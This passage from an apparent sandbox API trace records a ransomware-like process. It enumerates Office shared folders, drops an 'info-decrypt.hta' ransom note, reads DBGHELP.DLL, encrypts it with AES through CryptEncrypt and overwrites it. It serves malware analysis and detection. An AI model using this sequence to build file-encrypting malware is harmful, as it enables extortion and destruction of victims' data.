ftLastWriteTime.dwLowDateTime=0xeef4d890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Source Engine", cAlternateFileName="SOURCE~1")) returned 1 [0147.295] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e177d26, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e177d26, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0147.295] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xcf4f23c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xcf4f23c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TextConv", cAlternateFileName="")) returned 1 [0147.296] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="THEMES14", cAlternateFileName="")) returned 1 [0147.296] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54a7f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TRANSLAT", cAlternateFileName="")) returned 1 [0147.296] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Triedit", cAlternateFileName="")) returned 1 [0147.296] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VBA", cAlternateFileName="")) returned 1 [0147.296] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd2c6940, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xd250e300, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xd250e300, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VC", cAlternateFileName="")) returned 1 [0147.296] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x803feff7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x803feff7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VGX", cAlternateFileName="")) returned 1 [0147.296] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81afcd40, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Visio Shared", cAlternateFileName="VISIOS~1")) returned 1 [0147.296] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a42070, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0xd6cdb800, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6cdb800, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VSTO", cAlternateFileName="")) returned 1 [0147.297] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeeb5310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6a02ad50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6a02ad50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Folders", cAlternateFileName="WEBFOL~1")) returned 1 [0147.297] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Server Extensions", cAlternateFileName="WEBSER~1")) returned 1 [0147.297] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0147.297] FindClose (in: hFindFile=0xb7f0d0 | out: hFindFile=0xb7f0d0) returned 1 [0147.297] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8eeac) returned 1 [0147.297] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8eeb8) returned 1 [0147.297] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ee9c) returned 1 [0147.297] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW", nBufferLength=0x105, lpBuffer=0x6d8e9a4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW", lpFilePart=0x0) returned 0x31 [0147.297] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", nBufferLength=0x105, lpBuffer=0x6d8e978, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", lpFilePart=0x0) returned 0x32 [0147.297] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\*", lpFindFileData=0x6d8ebc4 | out: lpFindFileData=0x6d8ebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e19d30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbe166c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdbe166c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f0d0 [0147.298] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e19d30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbe166c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdbe166c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.298] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a0ba500, ftCreationTime.dwHighDateTime=0x1c982ad, ftLastAccessTime.dwLowDateTime=0x6086b2d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4a0ba500, ftLastWriteTime.dwHighDateTime=0x1c982ad, nFileSizeHigh=0x0, nFileSizeLow=0x14e760, dwReserved0=0x0, dwReserved1=0x0, cFileName="DBGHELP.DLL", cAlternateFileName="")) returned 1 [0147.298] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f8f7000, ftCreationTime.dwHighDateTime=0x1cba06d, ftLastAccessTime.dwLowDateTime=0xdb9ec040, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2f8f7000, ftLastWriteTime.dwHighDateTime=0x1cba06d, nFileSizeHigh=0x0, nFileSizeLow=0xf2b88, dwReserved0=0x0, dwReserved1=0x0, cFileName="DW20.EXE", cAlternateFileName="")) returned 1 [0147.298] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e5e4300, ftCreationTime.dwHighDateTime=0x1cba06d, ftLastAccessTime.dwLowDateTime=0xdbe62980, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2e5e4300, ftLastWriteTime.dwHighDateTime=0x1cba06d, nFileSizeHigh=0x0, nFileSizeLow=0x99ba0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DWTRIG20.EXE", cAlternateFileName="")) returned 1 [0147.298] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0147.298] FindClose (in: hFindFile=0xb7f0d0 | out: hFindFile=0xb7f0d0) returned 1 [0147.298] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ee5c) returned 1 [0147.299] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ee68) returned 1 [0147.299] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ee9c) returned 1 [0147.299] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW", nBufferLength=0x105, lpBuffer=0x6d8e9a4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW", lpFilePart=0x0) returned 0x31 [0147.299] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", nBufferLength=0x105, lpBuffer=0x6d8e978, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", lpFilePart=0x0) returned 0x32 [0147.299] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\*", lpFindFileData=0x6d8ebc4 | out: lpFindFileData=0x6d8ebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e19d30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbe166c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdbe166c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f0d0 [0147.299] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e19d30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbe166c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdbe166c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.299] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a0ba500, ftCreationTime.dwHighDateTime=0x1c982ad, ftLastAccessTime.dwLowDateTime=0x6086b2d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4a0ba500, ftLastWriteTime.dwHighDateTime=0x1c982ad, nFileSizeHigh=0x0, nFileSizeLow=0x14e760, dwReserved0=0x0, dwReserved1=0x0, cFileName="DBGHELP.DLL", cAlternateFileName="")) returned 1 [0147.299] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f8f7000, ftCreationTime.dwHighDateTime=0x1cba06d, ftLastAccessTime.dwLowDateTime=0xdb9ec040, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2f8f7000, ftLastWriteTime.dwHighDateTime=0x1cba06d, nFileSizeHigh=0x0, nFileSizeLow=0xf2b88, dwReserved0=0x0, dwReserved1=0x0, cFileName="DW20.EXE", cAlternateFileName="")) returned 1 [0147.299] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e5e4300, ftCreationTime.dwHighDateTime=0x1cba06d, ftLastAccessTime.dwLowDateTime=0xdbe62980, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2e5e4300, ftLastWriteTime.dwHighDateTime=0x1cba06d, nFileSizeHigh=0x0, nFileSizeLow=0x99ba0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DWTRIG20.EXE", cAlternateFileName="")) returned 1 [0147.300] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e5e4300, ftCreationTime.dwHighDateTime=0x1cba06d, ftLastAccessTime.dwLowDateTime=0xdbe62980, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2e5e4300, ftLastWriteTime.dwHighDateTime=0x1cba06d, nFileSizeHigh=0x0, nFileSizeLow=0x99ba0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DWTRIG20.EXE", cAlternateFileName="")) returned 0 [0147.300] FindClose (in: hFindFile=0xb7f0d0 | out: hFindFile=0xb7f0d0) returned 1 [0147.300] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ee5c) returned 1 [0147.300] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ee68) returned 1 [0147.300] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL", nBufferLength=0x105, lpBuffer=0x6d8e910, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL", lpFilePart=0x0) returned 0x3d [0147.300] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\info-decrypt.hta", lpFilePart=0x0) returned 0x42 [0147.300] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed78) returned 1 [0147.300] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6d8edf4 | out: lpFileInformation=0x6d8edf4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0147.300] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed74) returned 1 [0147.300] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL", nBufferLength=0x105, lpBuffer=0x6d8e910, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL", lpFilePart=0x0) returned 0x3d [0147.300] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6d8e7b8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\info-decrypt.hta", lpFilePart=0x0) returned 0x42 [0147.300] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ecac) returned 1 [0147.300] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x50c [0147.301] GetFileType (hFile=0x50c) returned 0x1 [0147.301] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8eca8) returned 1 [0147.301] GetFileType (hFile=0x50c) returned 0x1 [0147.301] WriteFile (in: hFile=0x50c, lpBuffer=0x37e9a04*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6d8ed70, lpOverlapped=0x0 | out: lpBuffer=0x37e9a04*, lpNumberOfBytesWritten=0x6d8ed70*=0x1000, lpOverlapped=0x0) returned 1 [0147.302] WriteFile (in: hFile=0x50c, lpBuffer=0x37e9a04*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x6d8ed44, lpOverlapped=0x0 | out: lpBuffer=0x37e9a04*, lpNumberOfBytesWritten=0x6d8ed44*=0x55e, lpOverlapped=0x0) returned 1 [0147.302] CloseHandle (hObject=0x50c) returned 1 [0147.302] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL", lpFilePart=0x0) returned 0x3d [0147.302] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8edc4) returned 1 [0147.302] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll"), fInfoLevelId=0x0, lpFileInformation=0x37eaa20 | out: lpFileInformation=0x37eaa20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a0ba500, ftCreationTime.dwHighDateTime=0x1c982ad, ftLastAccessTime.dwLowDateTime=0x6086b2d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4a0ba500, ftLastWriteTime.dwHighDateTime=0x1c982ad, nFileSizeHigh=0x0, nFileSizeLow=0x14e760)) returned 1 [0147.305] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8edc0) returned 1 [0147.305] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL", nBufferLength=0x105, lpBuffer=0x6d8e804, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL", lpFilePart=0x0) returned 0x3d [0147.305] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ecf8) returned 1 [0147.305] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4b4 [0147.305] GetFileType (hFile=0x4b4) returned 0x1 [0147.305] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ecf4) returned 1 [0147.305] GetFileType (hFile=0x4b4) returned 0x1 [0147.305] GetFileSize (in: hFile=0x4b4, lpFileSizeHigh=0x6d8ee00 | out: lpFileSizeHigh=0x6d8ee00*=0x0) returned 0x14e760 [0147.306] ReadFile (in: hFile=0x4b4, lpBuffer=0x45d90c8, nNumberOfBytesToRead=0x14e760, lpNumberOfBytesRead=0x6d8edac, lpOverlapped=0x0 | out: lpBuffer=0x45d90c8*, lpNumberOfBytesRead=0x6d8edac*=0x14e760, lpOverlapped=0x0) returned 1 [0147.347] CloseHandle (hObject=0x4b4) returned 1 [0147.347] CryptAcquireContextW (in: phProv=0x6d8ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6d8ed4c*=0xbdf728) returned 1 [0147.348] CryptGenRandom (in: hProv=0xbdf728, dwLen=0x10, pbBuffer=0x37eaf50 | out: pbBuffer=0x37eaf50) returned 1 [0147.999] CryptImportKey (in: hProv=0xbdf728, pbData=0x380d1e4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6d8ed1c | out: phKey=0x6d8ed1c*=0xb7f050) returned 1 [0147.999] CryptContextAddRef (hProv=0xbdf728, pdwReserved=0x0, dwFlags=0x0) returned 1 [0147.999] CryptContextAddRef (hProv=0xbdf728, pdwReserved=0x0, dwFlags=0x0) returned 1 [0147.999] CryptDuplicateKey (in: hKey=0xb7f050, pdwReserved=0x0, dwFlags=0x0, phKey=0x6d8ed0c | out: phKey=0x6d8ed0c*=0xb7f490) returned 1 [0147.999] CryptContextAddRef (hProv=0xbdf728, pdwReserved=0x0, dwFlags=0x0) returned 1 [0147.999] CryptSetKeyParam (hKey=0xb7f490, dwParam=0x4, pbData=0x380d2c4*=0x1, dwFlags=0x0) returned 1 [0147.999] CryptSetKeyParam (hKey=0xb7f490, dwParam=0x1, pbData=0x380d290, dwFlags=0x0) returned 1 [0148.007] CryptEncrypt (in: hKey=0xb7f490, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4bb37f0*, pdwDataLen=0x6d8ed78*=0x14e770, dwBufLen=0x14e770 | out: pbData=0x4bb37f0*, pdwDataLen=0x6d8ed78*=0x14e770) returned 1 [0148.112] CryptEncrypt (in: hKey=0xb7f490, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x36aa0b4*, pdwDataLen=0x6d8ed80*=0x0, dwBufLen=0x10 | out: pbData=0x36aa0b4*, pdwDataLen=0x6d8ed80*=0x10) returned 1 [0148.114] CryptDestroyKey (hKey=0xb7f050) returned 1 [0148.114] CryptReleaseContext (hProv=0xbdf728, dwFlags=0x0) returned 1 [0148.114] CryptReleaseContext (hProv=0xbdf728, dwFlags=0x0) returned 1 [0148.114] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL", nBufferLength=0x105, lpBuffer=0x6d8e7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL", lpFilePart=0x0) returned 0x3d [0148.114] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ece4) returned 1 [0148.114] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x31c [0148.117] GetFileType (hFile=0x31c) returned 0x1 [0148.117] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ece0) returned 1 [0148.117] GetFileType (hFile=0x31c) returned 0x1 [0148.117] WriteFile (in: hFile=0x31c, lpBuffer=0x36aa6c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x6d8ed74, lpOverlapped=0x0 | out: lpBuffer=0x36aa6c4*, lpNumberOfBytesWritten=0x6d8ed74*=0x20, lpOverlapped=0x0) returned 1 [0148.117] CloseHandle (hObject=0x31c) returned 1 [0148.118] CoTaskMemAlloc (cb=0x20c) returned 0xbd8860 [0148.118] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbd8860 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0148.118] CoTaskMemFree (pv=0xbd8860) [0148.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6d8e7d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0148.118] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ed20 | out: ppv=0x6d8ed20*=0xb51e34) returned 0x0 [0148.118] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ed18 | out: pAptType=0x6d8ed18*=1) returned 0x0 [0148.118] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, 